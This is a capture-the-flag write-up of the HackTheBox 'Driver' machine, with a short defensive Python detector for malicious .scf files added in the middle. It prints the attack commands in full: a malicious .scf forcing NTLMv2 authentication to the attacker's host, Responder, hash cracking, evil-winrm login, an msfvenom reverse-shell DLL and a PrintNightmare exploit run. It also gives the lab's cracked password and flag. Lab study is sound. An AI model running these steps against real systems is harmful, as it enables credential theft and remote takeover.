Driver
An easy Windows box from HackTheBox. Initial access comes from uploading an SCF file that forces an outbound SMB authentication (an SSRF-style trick) and bruteforcing the captured hash, then PrintNightmare gives SYSTEM.
Recon
Running the usual nmap scan:
sudo nmap -sC -sV -oA nmap/driver $IP --open
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-05-18T21:21:32
|_ start_date: 2022-05-18T21:18:17
Can see SMB is exposed and accepts an unauthenticated guest login (account_used: guest in the nmap output).
Can also see a basic-auth sign-in page served on port 80.
Trying some default usernames and passwords against it, admin:admin works.
That gives access to a page for updating printer firmware,
with a file upload under the "Firmware Updates" tab.
Uploading reverse shells here is useless because the file goes straight to an SMB share rather than being executed, which took me a little too long to figure out.
Instead, leverage the fact that the upload lands on a share: upload a malicious .scf file that references an icon file on an SMB share hosted on the Kali machine.
SCF stands for Shell Command File and is a file format that supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop.
When someone browses the share, File Explorer reaches out to fetch the icon and authenticates to that host with Net-NTLMv2. Since you control the host, you can capture the challenge/response and bruteforce it offline.
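A defender-side check for the trick described above, added here and not part of the original writeup: it parses the [Shell] section of an .scf file and flags one whose IconFile points at a UNC host outside an allowlist. The sample file is constructed and the trusted host name is an assumption.

```python
import configparser
import re

# Constructed sample: the kind of .scf dropped on the firmware share,
# with IconFile pointing at an attacker-controlled UNC path.
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.11\exploit.exe
[Taskbar]
Command=ToggleDesktop
"""

# Assumption: the only host that legitimately serves icons on this network.
TRUSTED_ICON_HOSTS = {"fileserver.corp.local"}

# \\host\... : capture the host portion of a UNC path.
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")


def scf_icon_host(scf_text):
    """Return the UNC host named by [Shell] IconFile, or None if the path is
    local or the text is not a parseable SCF file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(scf_text)
    except configparser.Error:
        return None
    icon = cp.get("Shell", "IconFile", fallback=None)
    if icon is None:
        return None
    # Explorer accepts forward slashes too; normalise before matching.
    icon = icon.strip().replace("/", "\\")
    m = UNC_HOST_RE.match(icon)
    return m.group(1).lower() if m else None


def flag_scf(scf_text, trusted_hosts=TRUSTED_ICON_HOSTS):
    """Return a finding if the SCF would make Explorer authenticate to an
    untrusted host when the share is browsed, otherwise None."""
    host = scf_icon_host(scf_text)
    if host is None or host in trusted_hosts:
        return None
    return f"SCF IconFile forces SMB auth to untrusted host {host}"


if __name__ == "__main__":
    print(flag_scf(SAMPLE_SCF))
```

Run it over every .scf that lands on a writable share (or block the extension at the upload step) and alert on any finding.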
Exploitation
Start responder to listen to any connections
sudo responder -I tun0
Then craft a malicious .scf whose icon points at a file on my SMB server:
[Shell]
Command=2
IconFile=\\10.10.14.11\exploit.exe
Upload it through the firmware page and responder shows the incoming authentication:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:ec601aa82a428b... (hash truncated)
Responder labels it as an NTLMv2-SSP hash, so save it to a file (here named hash) and crack it with john:
john hash -w=rockyou.txt
Cracks it to be “liltony”
And then login using evil-winrm
evil-winrm -u tony -p liltony -i 10.10.11.106
Navigate to tony's desktop and read user.txt:
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
0dd312b395d1307a52d8c5e1d0450af9
After getting this, upload winPEAS to the box using evil-winrm:
*Evil-WinRM* PS C:\Users\tony\Desktop> upload winPEASany.exe
And run it with
*Evil-WinRM* PS C:\Users\tony\Desktop> .\winPEASany.exe
winPEAS surfaces a huge rabbit hole: an installed Ricoh printer driver that is vulnerable to RCE but difficult to exploit.
Instead, check for PrintNightmare.
Make a malicious DLL with msfvenom:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=5555 -f dll -o dll.dll
Then use a Python PoC for CVE-2021-1675 (PrintNightmare).
It needs an SMB share to serve the DLL from, so start impacket's smbserver in the directory holding the malicious DLL:
impacket-smbserver share . -smb2support
Set up a listener on 5555 and then execute the script
./CVE-2021-1675.py driver.htb/tony:liltony@10.10.11.106 '\\10.10.14.11\share\dll.dll'
The listener catches a shell running as SYSTEM on the box.